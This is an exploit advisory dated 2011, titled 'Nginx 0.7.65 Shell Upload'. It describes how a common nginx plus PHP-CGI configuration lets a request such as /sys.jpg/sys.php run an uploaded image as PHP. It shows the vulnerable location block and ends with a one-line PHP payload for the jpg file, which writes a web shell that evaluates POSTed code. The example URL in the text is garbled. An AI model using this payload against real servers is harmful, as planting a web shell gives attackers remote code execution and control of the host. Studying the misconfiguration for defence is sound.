Nginx 0.7.65 Shell Upload

`# Exploit Title : Nginx Server Configuration hole ; Upload file execute  
# Software link : http://nginx.org/  
# Version : Confirmed in nginx v0.7.65. (And PHP v5.3.2 with Suhosin  
patch and extension).  
# Tested on : windows 7  
# Date : 29/07/2011  
# Author : sysmox.com  
# Website : http://www.sysmox.com  
# Email : info_at_sysmox.com  
  
  
Nginx project millions sites run it ; I also like it ; It has an excellent  
options ; Recently it became popularity about the volume of work and the  
develop the code .  
  
Nginx suffer from a widely flaw could lead a big damage and exploited by  
malicious hackers to gain access to infected system :  
  
If your configuration set up to nginx+php+cgi like :  
  
location ~ \.php$ {  
root html;  
fastcgi_pass 127.0.0.1:9000;  
fastcgi_index index.php;  
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;  
include fastcgi_params;  
}  
  
If a user browse as an example  
Http://www.site.com/sys.php<http://www.site.com/sys.php>  
Link would be /sys.jpg/sys.php .  
  
SCRIPT_FILENAME would become /scripts/sys.jpg and PATH_INFO would become  
sys.php; Thats mean if some body uploaded a a jpg file and execute it as an  
php .  
  
The countenus of the jpg file can be like “<?fputs(fopen(“shell.PHP”,”w”  
),”<?eval(\$_POST[akt]);?>”)?>”  
`